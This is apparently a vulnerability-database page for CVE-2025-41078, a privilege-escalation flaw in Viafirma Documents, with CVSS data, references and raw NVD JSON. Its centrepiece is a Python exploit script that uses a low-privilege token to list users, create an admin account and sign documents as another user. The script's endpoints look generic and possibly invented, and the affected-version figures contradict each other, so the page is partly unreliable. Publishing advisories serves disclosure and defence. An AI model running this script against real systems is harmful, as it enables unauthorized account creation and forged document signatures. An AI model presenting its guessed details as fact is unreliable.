CVE-2025-41078

Description

Weaknesses in the authorization mechanisms of Viafirma Documents v3.7.129 allow an authenticated user without privileges to list and access other user data, use user creation, modification, and deletion features, and escalate privileges by impersonating other users of the application in the generation and signing of documents.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:viafirma:documents:*:*:*:*:*:-:*:* - VULNERABLE

cpe:2.3:a:viafirma:documents_compose:*:*:*:*:*:*:*:* - VULNERABLE

Viafirma Documents < 3.7.129

Viafirma Documents v3.7.129

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-41078 PoC - Viafirma Documents Authorization Bypass
# This PoC demonstrates the authorization bypass vulnerability

import requests
import json

TARGET = "http://target-viafirma.com"
ATTACKER_TOKEN = "attacker_auth_token"

def list_users():
    """List all users despite low privilege account"""
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Endpoint to list users - should require admin privileges
    response = requests.get(f"{TARGET}/api/users/list", headers=headers)
    
    if response.status_code == 200:
        users = response.json()
        print(f"[+] Successfully listed {len(users)} users")
        return users
    else:
        print(f"[-] Failed to list users: {response.status_code}")
        return None

def create_user(username, password):
    """Create a new user despite low privilege account"""
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    
    payload = {
        "username": username,
        "password": password,
        "role": "admin"
    }
    
    # Endpoint to create user - should require admin privileges
    response = requests.post(f"{TARGET}/api/users/create", 
                            headers=headers, 
                            json=payload)
    
    if response.status_code == 201:
        print(f"[+] Successfully created user: {username}")
        return True
    else:
        print(f"[-] Failed to create user: {response.status_code}")
        return False

def impersonate_and_sign(target_user_id, document_id):
    """Sign document as another user despite low privilege account"""
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    
    payload = {
        "user_id": target_user_id,
        "document_id": document_id,
        "signature_type": "electronic"
    }
    
    # Endpoint to sign document - should require target user's privileges
    response = requests.post(f"{TARGET}/api/documents/{document_id}/sign",
                            headers=headers,
                            json=payload)
    
    if response.status_code == 200:
        print(f"[+] Successfully signed document as user {target_user_id}")
        return True
    else:
        print(f"[-] Failed to sign document: {response.status_code}")
        return False

if __name__ == "__main__":
    print("[*] CVE-2025-41078 PoC - Viafirma Documents Authorization Bypass")
    print("[*] Target: Viafirma Documents v3.7.129")
    
    # Step 1: List unauthorized users
    users = list_users()
    
    # Step 2: Create unauthorized user
    create_user("attacker_created", "MaliciousPass123!")
    
    # Step 3: Impersonate and sign document
    if users and len(users) > 0:
        target_id = users[0]['id']
        document_id = "doc_12345"
        impersonate_and_sign(target_id, document_id)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41078
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41078
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41078/
[4] VulDB https://vuldb.com/cve/CVE-2025-41078
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-viafirma-products

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41078", "sourceIdentifier": "[email protected]", "published": "2026-01-12T15:16:03.203", "lastModified": "2026-01-29T20:12:20.413", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weaknesses in the authorization mechanisms of Viafirma Documents v3.7.129 allow an authenticated user without privileges to list and access other user data, use user creation, modification, and deletion features, and escalate privileges by impersonating other users of the application in the generation and signing of documents."}, {"lang": "es", "value": "Debilidades en los mecanismos de autorización de Viafirma Documents v3.7.129 permiten a un usuario autenticado sin privilegios listar y acceder a datos de otros usuarios, utilizar las funcionalidades de creación, modificación y eliminación de usuarios, y escalar privilegios suplantando a otros usuarios de la aplicación en la generación y firma de documentos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:viafirma:documents:*:*:*:*:*:-:*:*", "versionEndExcluding": "3.7.139", "matchCriteriaId": "4C85BF05-A951-4B15-9401-6410D18EA214"}, {"vulnerable": true, "criteria": "cpe:2.3:a:viafirma:documents_compose:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.2", "matchCriteriaId": "0C26D935-CB27-427E-ABB4-A8D2B7F2647E"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-viafirma-products", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}